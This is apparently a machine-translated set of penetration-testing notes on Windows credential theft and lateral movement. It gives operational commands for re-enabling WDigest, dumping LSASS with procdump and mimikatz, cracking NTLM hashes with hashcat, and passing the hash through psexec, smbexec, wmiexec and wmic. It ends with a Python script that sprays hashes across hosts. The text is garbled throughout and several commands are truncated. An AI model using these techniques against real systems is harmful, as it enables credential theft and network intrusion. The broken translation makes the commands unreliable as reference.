point of knowledge (math.)
Default for windows 2012 and aboveClose wdigust, the attacker cannot get the plaintext password from memory;
Windows 2012 or below if you installKB287199 Patch, and likewise cannot obtain plaintext passwords from memory;
cure:
1, the use of hash hash pass (ptl, ptk, etc.) to move
2, the use of other service protocols (SMB, WMI, etc.) for hash movement
3, the use of registry operations to open the wdigust, Auth value for obtaining
4、Using tools or third-party platforms (Hachcat) for cracking
Knowledge Point 2:
Windows system LM Hash and NTLM Hash encryption algorithm, personal system after Windows vista, server system after Windows 2003, authentication method are NTLM Hash.
Registry modifications to turn on the Wdigest Auth value
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Procdump (windows official) + Mimikatz with the acquisition of the
vantage: Includes some windows local policy and account management, after obtaining the file, it can be decrypted locally mimikatz;
cmd switch disk:cd /d target address
When mimikatz fails to retrieve the password, use procdump to retrieve it.
1, to generate the password hash value stored in the .dmp file
procdump -accepteula -ma
2. Put the dmp file on mimikatz and execute it
Privilege::debug
Logging the results of console input: log
sekurlsa::minidump
sekurlsa::logonPasswords full
With two software to extract passwords
Pwdump7
QuarksPwdump
Hashcat Tool Crack Get Windows NTML Hash
hashcat -a 0 -m 1000 hash file --force
The tool also supports more password cracking
32ed87bdb5fdc5e9cba88547376818d4
Remote execution via plaintext hash delivery using SMB services, with the condition that service port 445 is open is sufficient;
1、psexec first (file in pstool): ipc link first, psexec needs to be passed plaintext or hash
Need ipc link first, -s to run with System privileges
net use \[IP]\ipc$"[password]" /user:[username]
net use \192.168.79.132\ipc$ lcn#123456 /user:\Administrator #Establish tcp connection
\192.168.79.132 -s cmd
2, psexec the second: no need to establish IPC directly provide plaintext account passwords
\[IP] -u [username] -p [password] -s cmd
\192.168.79.132 -u administrator -p lcn#123456 -s cmd
-hashes :[password hash value] . /[username]@[IP].
-hashes :b7f2f7b2491ba316e8cd773f8c2d58df ./[email protected]
-hashes :$HASH$ ./[email protected]
-hashes :[password's hash value] [domain]/[username]@[IP]
-hashes :$HASH$ domain/[email protected]
Failed attempt.
The official Pstools can't use hash connections, you can use the impacket toolkit, which is easy to use and easy to kill
3smbexec no need to ipc link plaintext or hash pass first
smbexec [domain]/[username]:[password]@[IP]
smbexec /administrator:lcn#[email protected]
smbexec . /[username]:[password]@[ip]
smbexec ./administrator:lcn#[email protected]
smbexec -hashes :[password hash] . /[username]@[IP].
smbexec -hashes :$HASH$ ./lcn#[email protected]
smbexec -hashes :[password hash] [domain]/[username]@[IP]
smbexec -hashes :$HASH$ /[email protected]
smbexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df /[email protected]
Same thing with psexec templates from the impacket toolkit
psexec -hashes :b7f2f7b2491ba316e8cd773f8c2d58df /[email protected]
How to distinguish between local and domain users
net user : local user
net user /domain: domain user; domain name is required to connect to domain user;
Domain Lateral Mobility WMI services utilizing -cscript, wmiexec, wmic
WMI (Windows Management Instrumentation) is the== Exploitation via port 135, supports authentication by username plaintext or hash, and the method does not leave traces in the target logging system.==**
**1. Self-contained WMIC plaintext delivery, no display back
wmic /node:[IP] /user:[user ID] /password:[cryptographic] process call create "[command]"
wmic /node:192.168.79.130 /user:administrator /password:admin@123 process call create " /c ipconfig >C:\"
(Run cmd, execute ipconfig and output the result to the C drive)
2、Self-contained cscript plaintext delivery, there are back to show, need to download with the
cscript //nologo /shell [IP] [username] [password]
cscript //nologo /shell 192.168.79.130 administrator admin@123
Will bounce a shell
3, kit impacket wmiexec plaintext or hash delivery, there is a return exe version, may be killed
wmiexec . /[username]:[password]@[IP] "[command]"
wmiexec ./administrator:lcn#[email protected] "whoami"
wmiexec [domain]/[username]:[password]@[IP] "[command]"
wmiexec /administrator:lcn#[email protected] "whoami"
wmiexec -hashes :[password hash] . /[username]:[password]@[IP] "[command]"
wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./[email protected] "whoami"
wmiexec -hashes :[password hash value] [domain]/[username]:[password]@[IP] "[command]"
wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 god/[email protected] "whoami"
Domain lateral move above service hash batch utilization - python compiled exe
Batch attempts at horizontal penetration using exe files made by py scripts
Ideas for horizontal penetration attacks on the intranet
Collect passwords in plaintext or hash via mimikatz, "net user /domain" collects usernames in domain, "for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL=" "Explore live addresses in the domain
Batch scanning, bumping with passwords
Collect more passwords
Repeat steps 2 and 3
``
```
import os
import time
ips={
'192.168.79.128',
'192.168.79.129',
'192.168.79.130',
'192.168.79.132'
}
users={
'admin',
'Administrator',
'administrator',
'userlu',
'testuser',
'juligan'
}
hashs={
'579da618cfbfa85247acf1f800a280a4',
'b7f2f7b2491ba316e8cd773f8c2d58df'
}
'''
passs={
'admin@123', 'admin!123', 'admin#123', 'lcn#123456'}
'''
for ip in ips:
for user in users:
for hash in hashs:
# wmiexec -hashes :579da618cfbfa85247acf1f800a280a4 ./[email protected] "whoami"
exec="wmiexec -hashes :" +hash +' /' +user+ '@'+ ip + "whoami"
execs = "wmiexec -hashes :" + hash + ' ./administrator' + user + '@' + ip + "whoami"
print('--》'+exec+'《--')
(exec)
(1)
### Resources involved:
Hashcat:/hashcat/hashcat
Password cracking all-in-one tool: Hashcat password cracking cheats:/sectool/
mimikatz:/gentilkiwi/mimikatz
impacket:/SecureAuthCorp/impacket
impacket-examples-windows:/RichChigga/impacket-examples-windows
PsTools:/zh-cn/sysinternals/downloads/pstools
ProcDump:/zh-cn/sysinternals/downloads/procdump
:/realdeveloperongithub/K8tools/blob/master/
(looking for two):/mirrors/K8tools/blob/master/